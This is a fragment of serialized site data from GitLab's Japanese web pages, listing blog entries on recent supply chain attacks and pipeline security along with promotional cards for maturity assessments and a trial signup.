Baltman","automated-detection-testing-framework",{"title":1731,"description":1732,"heroImage":1012,"category":1006,"date":1733,"authors":1734,"slug":1736,"externalUrl":1010},"3月のサプライチェーン攻撃から学ぶパイプラインセキュリティ","2026年3月、Trivy・Checkmarx KICS・LiteLLM・axiosが次々と侵害されました。GitLabの集中管理されたパイプライン実行ポリシーが、これらのサプライチェーン攻撃パターンをどのように検出・ブロックできるかをご紹介します。","2026-04-07",[1735],"Grant Hickman","pipeline-security-lessons-from-march-supply-chain-incidents",{"title":1738,"description":1739,"heroImage":1740,"category":1006,"date":1741,"authors":1742,"slug":1744,"externalUrl":1010},"GitLabがnpmサプライチェーンへの大規模攻撃を発見","攻撃を引き起こすマルウェアには、ユーザーデータを破壊する「デッドマンスイッチ」が含まれています。","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749665667/Blog/Hero%20Images/built-in-security.jpg","2025-11-24",[1743,8],"Michael Henriksen","gitlab-discovers-widespread-npm-supply-chain-attack",{"promotions":1746},[1747,1761,1773,1784],{"id":1748,"categories":1749,"header":1751,"text":1752,"button":1753,"image":1758},"ai-modernization",[1750],"ai","AIの真価、組織全体で発揮できていますか？","所要時間は5分以内です",{"text":1754,"config":1755},"AI成熟度スコアを確認する",{"href":1756,"dataGaName":1757,"dataGaLocation":1240},"/ja-jp/assessments/ai-modernization-assessment/","modernization 
assessment",{"config":1759},{"src":1760},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":1762,"categories":1763,"header":1765,"text":1752,"button":1766,"image":1770},"devops-modernization",[1764,1560],"product","単にツールを管理するだけでなく、イノベーションを提供していますか？",{"text":1767,"config":1768},"DevOps成熟度スコアを確認しましょう",{"href":1769,"dataGaName":1757,"dataGaLocation":1240},"/ja-jp/assessments/devops-modernization-assessment/",{"config":1771},{"src":1772},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":1774,"categories":1775,"header":1776,"text":1752,"button":1777,"image":1781},"security-modernization",[1022],"スピードのためにセキュリティを犠牲にしていませんか？",{"text":1778,"config":1779},"セキュリティ成熟度スコアを確認しましょう",{"href":1780,"dataGaName":1757,"dataGaLocation":1240},"/ja-jp/assessments/security-modernization-assessment/",{"config":1782},{"src":1783},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":1785,"paths":1786,"header":1789,"text":1790,"button":1791,"image":1796},"github-azure-migration",[1787,1788],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","チームはGitHubのAzure移行に対応できていますか？","GitHubはすでにAzureを基盤として再構築を進めています。それがあなたのチームにとって何を意味するのか、ご確認ください。",{"text":1792,"config":1793},"GitLabとGitHubの比較を見る",{"href":1794,"dataGaName":1795,"dataGaLocation":1240},"/ja-jp/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":1797},{"src":1772},{"header":1799,"blurb":1800,"button":1801,"secondaryButton":1805},"今すぐ開発をスピードアップ","DevSecOpsに特化したインテリジェントオーケストレーションプラットフォームで実現できることをご確認ください。\n",{"text":1034,"config":1802},{"href":1803,"dataGaName":1037,"dataGaLocation":1804},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/ja-jp/","feature",{"text":1345,"config":1806},{"href":1041,"dataGaName":1042,"dataGaLocation":1804},1781392835169]